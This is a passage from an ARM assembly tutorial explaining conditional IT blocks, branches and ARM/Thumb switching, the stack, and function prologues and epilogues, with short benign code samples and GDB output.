    
    ITE    GT           ; Next 2 instructions are conditional
    ADDGT  R1, R0, #55  ; Conditional addition in case the GT is true
    ADDLE  R1, R0, #48  ; Conditional addition in case the GT is not true
    
    ITTEE  EQ           ; Next 4 instructions are conditional
    MOVEQ  R0, R1       ; Conditional MOV
    ADDEQ  R2, R2, #10  ; Conditional ADD
    ANDNE  R3, R3, #1   ; Conditional AND
    BNE.W  dloop        ; Branch instruction can only be used in the last instruction of an IT block

    Wrong syntax:

    IT     NE           ; Next instruction is conditional     
    ADD    R0, R0, R1   ; Syntax error: no condition code used in IT block.

    Here are the conditional codes and their opposite:

    Let’s try this out with the following example code:

    .syntax unified    @ this is important!
    .text
    .global _start
    
    _start:
        .code 32
        add r3, pc, #1   @ increase value of PC by 1 and add it to R3
        bx r3            @ branch + exchange to the address in R3 -> switch to Thumb state because LSB = 1
    
        .code 16         @ Thumb state
        cmp r0, #10      
        ite eq           @ if R0 is equal 10...
        addeq r1, #2     @ ... then R1 = R1 + 2
        addne r1, #3     @ ... else R1 = R1 + 3
        bkpt

    .code 32

    This example code starts in ARM state. The first instruction adds the address specified in PC plus 1 to R3 and then branches to the address in R3.  This will cause a switch to Thumb state, because the LSB (least significant bit) is 1 and therefore not 4 byte aligned. It’s important to use bx (branch + exchange) for this purpose. After the branch the T (Thumb) flag is set and we are in Thumb state.

    .code 16

    In Thumb state we first compare R0 with #10, which will set the Negative flag (0 – 10 = – 10). Then we use an If-Then-Else block. This block will skip the ADDEQ instruction because the Z (Zero) flag is not set and will execute the ADDNE instruction because the result was NE (not equal) to 10.

    Stepping through this code in GDB will mess up the result, because you would execute both instructions in the ITE block. However running the code in GDB without setting a breakpoint and stepping through each instruction will yield to the correct result setting R1 = 3.

    BRANCHES

    Branches (aka Jumps) allow us to jump to another code segment. This is useful when we need to skip (or repeat) blocks of codes or jump to a specific function. Best examples of such a use case are IFs and Loops. So let’s look into the IF case first.

    .global main
    
    main:
            mov     r1, #2     /* setting up initial variable a */
            mov     r2, #3     /* setting up initial variable b */
            cmp     r1, r2     /* comparing variables to determine which is bigger */
            blt     r1_lower   /* jump to r1_lower in case r2 is bigger (N==1) */
            mov     r0, r1     /* if branching/jumping did not occur, r1 is bigger (or the same) so store r1 into r0 */
            b       end        /* proceed to the end */
    r1_lower:
            mov r0, r2         /* We ended up here because r1 was smaller than r2, so move r2 into r0 */
            b end              /* proceed to the end */
    end:
            bx lr              /* THE END */

    The code above simply checks which of the initial numbers is bigger and returns it as an exit code. A C-like pseudo-code would look like this:

    int main() {
       int max = 0;
       int a = 2;
       int b = 3;
       if(a < b) {
        max = b;
       }
       else {
        max = a;
       }
       return max;
    }

    Now here is how we can use conditional and unconditional branches to create a loop.

    .global main
    
    main:
            mov     r0, #0     /* setting up initial variable a */
    loop:
            cmp     r0, #4     /* checking if a==4 */
            beq     end        /* proceeding to the end if a==4 */
            add     r0, r0, #1 /* increasing a by 1 if the jump to the end did not occur */
            b loop             /* repeating the loop */
    end:
            bx lr              /* THE END */

    A C-like pseudo-code of such a loop would look like this:

    int main() {
       int a = 0;
       while(a < 4) {
       a= a+1;
       }
       return a;
    }

    B / BX / BLX

    There are three types of branching instructions:

    • Branch (B)
      • Simple jump to a function
    • Branch link (BL)
      • Saves (PC+4) in LR and jumps to function
    • Branch exchange (BX) and Branch link exchange (BLX)
      • Same as B/BL + exchange instruction set (ARM <-> Thumb)
      • Needs a register as first operand: BX/BLX reg

    BX/BLX is used to exchange the instruction set from ARM to Thumb.

    .text
    .global _start
    
    _start:
         .code 32         @ ARM mode
         add r2, pc, #1   @ put PC+1 into R2
         bx r2            @ branch + exchange to R2
    
        .code 16          @ Thumb mode
         mov r0, #1

    The trick here is to take the current value of the actual PC, increase it by 1, store the result to a register, and branch (+exchange) to that register. We see that the addition (add r2, pc, #1) will simply take the effective PC address (which is the current PC register’s value + 8 -> 0x805C) and add 1 to it (0x805C + 1 = 0x805D). Then, the exchange happens if the Least Significant Bit (LSB) of the address we branch to is 1 (which is the case, because 0x805D = 10000000 01011101), meaning the address is not 4 byte aligned. Branching to such an address won’t cause any misalignment issues. This is how it would look like in GDB (with GEF extension):

    Please note that the GIF above was created using the older version of GEF so it’s very likely that you see a slightly different UI and different offsets. Nevertheless, the logic is the same.

    Conditional Branches

    Branches can also be executed conditionally and used for branching to a function if a specific condition is met. Let’s look at a very simple example of a conditional branch suing BEQ. This piece of assembly does nothing interesting other than moving values into registers and branching to another function if a register is equal to a specified value. 

    .text
    .global _start
    
    _start:
       mov r0, #2
       mov r1, #2
       add r0, r0, r1
       cmp r0, #4
       beq func1
       add r1, #5
       b func2
    func1:
       mov r1, r0
       bx  lr
    func2:
       mov r0, r1
       bx  lr
    STACK AND FUNCTIONS

    In this part we will look into a special memory region of the process called the Stack. This chapter covers Stack’s purpose and operations related to it. Additionally, we will go through the implementation, types and differences of functions in ARM.

    STACK

    Generally speaking, the Stack is a memory region within the program/process. This part of the memory gets allocated when a process is created. We use Stack for storing temporary data such as local variables of some function, environment variables which helps us to transition between the functions, etc. We interact with the stack using PUSH and POP instructions. As explained in  Memory Instructions: Load And Store PUSH and POP are aliases to some other memory related instructions rather than real instructions, but we use PUSH and POP for simplicity reasons.

    Before we look into a practical example it is import for us to know that the Stack can be implemented in various ways. First, when we say that Stack grows, we mean that an item (32 bits of data) is put on to the Stack. The stack can grow UP (when the stack is implemented in a Descending fashion) or DOWN (when the stack is implemented in a Ascending fashion). The actual location where the next (32 bit) piece of information will be put is defined by the Stack Pointer, or to be precise, the memory address stored in the SP register. Here again, the address could be pointing to the current (last) item in the stack or the next available memory slot for the item. If the SP is currently pointing to the last item in the stack (Full stack implementation) the SP will be decreased (in case of Descending Stack) or increased (in case of Ascending Stack) and only then the item will placed in the Stack. If the SP is currently pointing to the next empty slot in the Stack, the data will be first placed and only then the SP will be decreased (Descending Stack) or increased (Ascending Stack).

     

    As a summary of different Stack implementations we can use the following table which describes which Store Multiple/Load Multiple instructions are used in different cases.

    In our examples we will use the Full descending Stack. Let’s take a quick look into a simple exercise which deals with such a Stack and it’s Stack Pointer.

    /* azeria@labs:~$ as stack.s -o stack.o && gcc stack.o -o stack && gdb stack */
    .global main
    
    main:
         mov   r0, #2  /* set up r0 */
         push  {r0}    /* save r0 onto the stack */
         mov   r0, #3  /* overwrite r0 */
         pop   {r0}    /* restore r0 to it's initial state */
         bx    lr      /* finish the program */

    At the beginning, the Stack Pointer points to address 0xbefff6f8 (could be different in your case), which represents the last item in the Stack. At this moment, we see that it stores some value (again, the value can be different in your case):

    gef> x/1x $sp
    0xbefff6f8: 0xb6fc7000

    After executing the first (MOV) instruction, nothing changes in terms of the Stack. When we execute the PUSH instruction, the following happens: first, the value of SP is decreased by 4 (4 bytes = 32 bits). Then, the contents of R0 are stored to the new address specified by SP. When we now examine the updated memory location referenced by SP, we see that a 32 bit value of integer 2 is stored at that location:

    gef> x/x $sp
    0xbefff6f4: 0x00000002

    The instruction (MOV r0, #3) in our example is used to simulate the corruption of the R0. We then use POP to restore a previously saved value of R0. So when the POP gets executed, the following happens: first, 32 bits of data are read from the memory location (0xbefff6f4) currently pointed by the address in SP. Then, the SP register’s value is increased by 4 (becomes 0xbefff6f8 again). The register R0 contains integer value 2 as a result.

    gef> info registers r0
    r0       0x2          2

    (Please note that the following gif shows the stack having the lower addresses at the top and the higher addresses at the bottom, rather than the other way around like in the first illustration of different Stack variations. The reason for this is to make it look like the Stack view you see in GDB)

    We will see that functions take advantage of Stack for saving local variables, preserving register state, etc. To keep everything organized, functions use Stack Frames, a localized memory portion within the stack which is dedicated for a specific function. A stack frame gets created in the prologue (more about this in the next section) of a function. The Frame Pointer (FP) is set to the bottom of the stack frame and then stack buffer for the Stack Frame is allocated. The stack frame (starting from it’s bottom) generally contains the return address (previous LR), previous Frame Pointer, any registers that need to be preserved, function parameters (in case the function accepts more than 4), local variables, etc. While the actual contents of the Stack Frame may vary, the ones outlined before are the most common. Finally, the Stack Frame gets destroyed during the epilogue of a function.

    Here is an abstract illustration of a Stack Frame within the stack:

    As a quick example of a Stack Frame visualization, let’s use this piece of code:

    /* azeria@labs:~$ gcc func.c -o func && gdb func */
    int main()
    {
     int res = 0;
     int a = 1;
     int b = 2;
     res = max(a, b);
     return res;
    }
    
    int max(int a,int b)
    {
     do_nothing();
     if(a<b)
     {
     return b;
     }
     else
     {
     return a;
     }
    }
    int do_nothing()
    {
     return 0;
    }

    In the screenshot below we can see a simple illustration of a Stack Frame through the perspective of GDB debugger.

    We can see in the picture above that currently we are about to leave the function max (see the arrow in the disassembly at the bottom). At this state, the FP (R11) points to 0xbefff254 which is the bottom of our Stack Frame. This address on the Stack (green addresses) stores 0x00010418 which is the return address (previous LR). 4 bytes above this (at 0xbefff250) we have a value 0xbefff26c, which is the address of a previous Frame Pointer. The 0x1 and 0x2 at addresses 0xbefff24c and 0xbefff248 are local variables which were used during the execution of the function max. So the Stack Frame which we just analyzed had only LR, FP and two local variables.

    FUNCTIONS

    To understand functions in ARM we first need to get familiar with the structural parts of a function, which are:

    1. Prologue
    2. Body
    3. Epilogue

    The purpose of the prologue is to save the previous state of the program (by storing values of LR and R11 onto the Stack) and set up the Stack for the local variables of the function. While the implementation of the prologue may differ depending on a compiler that was used, generally this is done by using PUSH/ADD/SUB instructions. An example of a prologue would look like this:

    push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack. This also allocates space for the Stack Frame */

    The body part of the function is usually responsible for some kind of unique and specific task. This part of the function may contain various instructions, branches (jumps) to other functions, etc. An example of a body section of a function can be as simple as the following few instructions:

    mov    r0, #1       /* setting up local variables (a=1). This also serves as setting up the first parameter for the function max */
    mov    r1, #2       /* setting up local variables (b=2). This also serves as setting up the second parameter for the function max */
    bl     max          /* Calling/branching to function max */

    The sample code above shows a snippet of a function which sets up local variables and then branches to another function. This piece of code also shows us that the parameters of a function (in this case function max) are passed via registers. In some cases, when there are more than 4 parameters to be passed, we would additionally use the Stack to store the remaining parameters. It is also worth mentioning, that a result of a function is returned via the register R0. So what ever the result of a function (max) turns out to be, we should be able to pick it up from the register R0 right after the return from the function. One more thing to point out is that in certain situations the result might be 64 bits in length (exceeds the size of a 32bit register). In that case we can use R0 combined with R1 to return a 64 bit result.

    The last part of the function, the epilogue, is used to restore the program’s state to it’s initial one (before the function call) so that it can continue from where it left of. For that we need to readjust the Stack Pointer. This is done by using the Frame Pointer register (R11) as a reference and performing add or sub operation. Once we readjust the Stack Pointer, we restore the previously (in prologue) saved register values by poping them from the Stack into respective registers. Depending on the function type, the POP instruction might be the final instruction of the epilogue. However, it might be that after restoring the register values we use BX instruction for leaving the function. An example of an epilogue looks like this:

    sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11, pc}    /* End of the epilogue. Restoring Frame Pointer from the Stack, jumping to previously saved LR via direct load into PC. The Stack Frame of a function is finally destroyed at this step. */

    So now we know, that:

    1. Prologue sets up the environment for the function;
    2. Body implements the function’s logic and stores result to R0;
    3. Epilogue restores the state so that the program can resume from where it left of before calling the function.

    Another key point to know about the functions is their types: leaf and non-leaf. The leaf function is a kind of a function which does not call/branch to another function from itself. A non-leaf function is a kind of a function which in addition to it’s own logic’s does call/branch to another function. The implementation of these two kind of functions are similar. However, they have some differences. To analyze the differences of these functions we will use the following piece of code:

    /* azeria@labs:~$ as func.s -o func.o && gcc func.o -o func && gdb func */
    .global main
    
    main:
    	push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    	add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    	sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack */
    	mov    r0, #1       /* setting up local variables (a=1). This also serves as setting up the first parameter for the max function */
    	mov    r1, #2       /* setting up local variables (b=2). This also serves as setting up the second parameter for the max function */
    	bl     max          /* Calling/branching to function max */
    	sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    	pop    {r11, pc}    /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */
    
    max:
    	push   {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    	add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    	sub    sp, sp, #12  /* End of the prologue. Allocating some buffer on the stack */
    	cmp    r0, r1       /* Implementation of if(a<b) */
    	movlt  r0, r1       /* if r0 was lower than r1, store r1 into r0 */
    	add    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    	pop    {r11}        /* restoring frame pointer */
    	bx     lr           /* End of the epilogue. Jumping back to main via LR register */

    The example above contains two functions: main, which is a non-leaf function, and max – a leaf function. As mentioned before, the non-leaf function calls/branches to another function, which is true in our case, because we branch to a function max from the function main. The function max in this case does not branch to another function within it’s body part, which makes it a leaf function.

    Another key difference is the way the prologues and epilogues are implemented. The following example shows a comparison of prologues of a non-leaf and leaf functions:

    /* A prologue of a non-leaf function */
    push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack */
    
    /* A prologue of a leaf function */
    push   {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #12  /* End of the prologue. Allocating some buffer on the stack */

    The main difference here is that the entry of the prologue in the non-leaf function saves more register’s onto the stack. The reason behind this is that by the nature of the non-leaf function, the LR gets modified during the execution of such a function and therefore the value of this register needs to be preserved so that it can be restored later. Generally, the prologue could save even more registers if it’s necessary.

    The comparison of the epilogues of the leaf and non-leaf functions, which we see below, shows us that the program’s flow is controlled in different ways: by branching to an address stored in the LR register in the leaf function’s case and by direct POP to PC register in the non-leaf function.

     /* An epilogue of a leaf function */
    add    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11}        /* restoring frame pointer */
    bx     lr           /* End of the epilogue. Jumping back to main via LR register */
    
    /* An epilogue of a non-leaf function */
    sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11, pc}    /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */

    Finally, it is important to understand the use of BL and BX instructions here. In our example, we branched to a leaf function by using a BL instruction. We use the the label of a function as a parameter to initiate branching. During the compilation process, the label gets replaced with a memory address. Before jumping to that location, the address of the next instruction is saved (linked) to the LR register so that we can return back to where we left off when the function max is finished.

    The BX instruction, which is used to leave the leaf function, takes LR register as a parameter. As mentioned earlier, before jumping to function max the BL instruction saved the address of the next instruction of the function main into the LR register. Due to the fact that the leaf function is not supposed to change the value of the LR register during it’s execution, this register can be now used to return to the parent (main) function. As explained in the previous chapter, the BX instruction  can eXchange between the ARM/Thumb modes during branching operation. In this case, it is done by inspecting the last bit of the LR register: if the bit is set to 1, the CPU will change (or keep) the mode to thumb, if it’s set to 0, the mode will be changed (or kept) to ARM. This is a nice design feature which allows to call functions from different modes.

    To take another perspective into functions and their internals we can examine the following animation which illustrates the inner workings of non-leaf and leaf functions.

FURTHER READING

1. Whirlwind Tour of ARM Assembly.
https://www.coranac.com/tonc/text/asm.htm

2. ARM assembler in Raspberry Pi.
http://thinkingeek.com/arm-assembler-raspberry-pi/

3. Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation by Bruce Dang, Alexandre Gazet, Elias Bachaalany and Sebastien Josse.

4. ARM Reference Manual.
http://infocenter.arm.com/help/topic/com.arm.doc.dui0068b/index.html

5. Assembler User Guide.
http://www.keil.com/support/man/docs/armasm/default.htm